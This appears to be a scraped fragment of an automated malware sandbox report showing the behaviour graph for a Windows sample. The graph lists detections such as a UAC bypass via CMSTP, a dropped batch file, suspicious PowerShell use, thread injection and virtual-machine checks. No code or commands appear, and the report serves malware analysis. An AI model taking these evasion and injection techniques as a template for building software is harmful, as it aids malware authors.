Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528503 Sample: XgKnAQpuPM.exe Startdate: 08/10/2024 Architecture: WINDOWS Score: 92 30 198.187.3.20.in-addr.arpa 2->30 38 Malicious sample detected (through community Yara rule) 2->38 40 Yara detected UAC Bypass using CMSTP 2->40 42 .NET source code contains potential unpacker 2->42 44 3 other signatures 2->44 9 XgKnAQpuPM.exe 1 3 2->9         started        12 rundll32.exe 2->12         started        signatures3 process4 file5 28 C:\Users\user\AppData\Local\...\vclib.bat, DOS 9->28 dropped 14 cmd.exe 1 9->14         started        process6 signatures7 46 Suspicious powershell command line found 14->46 48 Suspicious command line found 14->48 17 powershell.exe 30 14->17         started        20 WMIC.exe 1 14->20         started        22 conhost.exe 14->22         started        24 2 other processes 14->24 process8 signatures9 32 Sets debug register (to hijack the execution of another thread) 17->32 34 Modifies the context of a thread in another process (thread injection) 17->34 26 WerFault.exe 20 16 17->26         started        36 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 20->36 process10
No contacted IP infos

Contacted Domains

Name IP Active
198.187.3.20.in-addr.arpa unknown unknown